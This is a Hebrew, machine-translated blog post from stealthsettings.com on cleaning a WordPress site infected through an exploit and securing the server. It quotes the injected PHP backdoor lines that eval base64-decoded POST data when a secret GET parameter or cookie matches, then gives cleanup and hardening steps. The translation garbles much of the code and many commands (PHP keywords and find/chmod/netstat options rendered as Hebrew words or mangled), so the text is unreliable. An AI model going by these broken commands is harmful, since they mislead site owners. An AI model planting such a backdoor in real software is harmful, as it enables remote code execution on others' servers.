וורדפרס ניצול - ניקוי וירוס קבצים ושרת SQL והמאובטח.

לפני שאתם קוראים את הפוסט הזה, אתה צריך לראות , כדי להבין משהו. :)

מצאנו שרבים מהבלוגים על קבצי stealthsettings.com, הקוד דומים ללהלן, הנובע מvirusarii עם וורדפרס לנצל.:

<? Php if ($ _ GET [ '573abcb060974771'] == "8e96d1b4b674e1d2") {eval (base64_decode ($ _ POST [ 'קובץ'])); יציאה; }?>

si

<?php if($_COOKIE[XCHARX44e827f9fbeca184XCHARX]==XCHARX5cd3c94b4b1c57eaXCHARX){ eval(base64_decode($_POST[XCHARXfileXCHARX])); exit; } ?>

xmlrpcאם הנ"ל הוא על הקובץ xmlrpc.php מ ישנוני, ב grep שרת, נראה כמו די הרבה בקודי מקור מסוג זה.

pppffiuuu

ניקוי של קבצים נגועים:

Ooookkkk ...
1. הפתרון הטוב ביותר, כפי שזה נעשה גיבויוניקו את מסד הנתונים הוא להסיר קבצים וורדפרס (אתה יכול לשמור את קובץ wp-config.php ולא קשור אך ורק לפלטפורמת WP לאחר בדיקה קפדנית) בשרת ולעשות את הגרסה המקורית להעלות 2.5.1 (בהזדמנות זו ולבצע את שדרוג גרסת WP :)) http://wordpress.org/download/ . נגב כולל קבצי נושא אם אתה לא סומך על הבדיקה שהזהירה שלהם.

נראה שהוא נפגע וקבצים של נושאים שלא היה בשימוש בעבר על הבלוג ופשוט משנים את הנושא, אינו פותרים את הבעיה.

./andreea/wp-content/themes/default/index.php:<?php אם ($ _ COOKIE ['44e827f9fbeca184'] == '5cd3c94b4b1c57ea ") {eval (base64_decode ($ _ POST [' קובץ '])); יציאה; ??}> <Get_header PHP (); ?>

2. לחפש ולמחוק את כל קבצים המכילים:... * _new.php, * _old.php, * Jpgg, * Giff, * Pngg וקובץ wp-info.txt, אם בכלל.

מצא. -שם "* _new.php"
מצא. -שם "* _old.php"
מצא. "*. Jpgg", שם
מצא. -שם "* _giff"
מצא. -שם "* _pngg"
מצא. -שם "wp-info.txt"

3. בתוך / Tmp , חפש ולמחוק תיקיות כמו tmpYwbzT2

SQL ניקוי :

1. בטבלה טבלה wp_options בדקו וללמחוק את השורות: internal_links_cache, rss_f541b3abd05e7962fcab37737f40fad8 si wordpress_options.

2. הכל בwp_options, ללכת active_plugins ולמחוק אם יש תוסף שמסתיים באחת מהסיומות * _new.php, _old.php *, *. jpgg, *. giff, *. pngg או אם יש חשד הארכה נוספת, לבדוק בזהירות.

3. בטבלה wp_users, ראה אם ​​יש משתמש שלא כתב שום דבר בו ימנית, העמודה user_nicename. למחוק את המשתמש, אבל שים לב למספר שעל העמודה מזהה. משתמש זה עשוי להשתמש "וורדפרס", כפי user_login נוצר ומופיע ב00: 00: 00 0000-00-00.

4. עבור לטבלה wp_usermeta ולמחוק את כל הקווים השייכים מזהה לעיל.

אחרי שעשית ניקוי SQL זה, להשבית ולאחר מכן לאפשר לתוסף מסוים. (בבלוג -> לוח בקרה -> Plugins)

שרת מאובטח:

1. לראות מה תיקיות וקבצים הם "לצריבה"(Chmod 777) ולנסות לשים עליהם chmod שלא יאפשר את הכתיבה שלהם בכל רמה. (Chmod 644, למשל)

מצא. פרם--2-LS

2. ראה מה יש לקבצי המערכת קצת SUID או sgid . אם אתה לא משתמש בקבצים אלה לשים עליהם chmod 0 או להסיר את החבילה שהוא מכיל. הם מאוד מסוכנים, כי הם מבצעים הרשאות "קבוצה"או"שורש"לא עם הרשאות משתמש רגילות כדי לבצע את הקובץ הזה.

מוצא / מסוג F-סלסול-04000-LS
מוצא / מסוג F-סלסול-02000-LS

3. בדקו מה יציאות פתוחות ומנסה לסגור או לאבטח את אלה שאינם בשימוש.

netstat-| grep-i להקשיב

כל כך הרבה. אני רואה את חיפוש בגוגל ואחרים אומרים, "טוב שהם עשו!". ובכן גם לך לעשות את זה ... אבל אתה יודע שאם גוגל מתחילה לאסור כל האתרים טביעה הוא דואר זבל ולשים את סוסים טרויאניים (Trojan.Clicker.HTML) בעוגיות?

וורדפרס ניצול - ניקוי וירוס קבצים ושרת SQL והמאובטח.

על הסופר

התגנבות

תשוקה על כל דבר כלומר גאדג 'טים ו- IT, אני כותב עם stealthsettings הנאה מ 2006 ואני אוהב לגלות איתך דברים חדשים על מחשבים ומערכות הפעלה macOS, לינוקס, Windows, iOS ו- Android.

תגובת 1

השאירו תגובה

אתר זה משתמש Akismet כדי להפחית דואר זבל. למד כיצד הנתונים שלך מעובדים.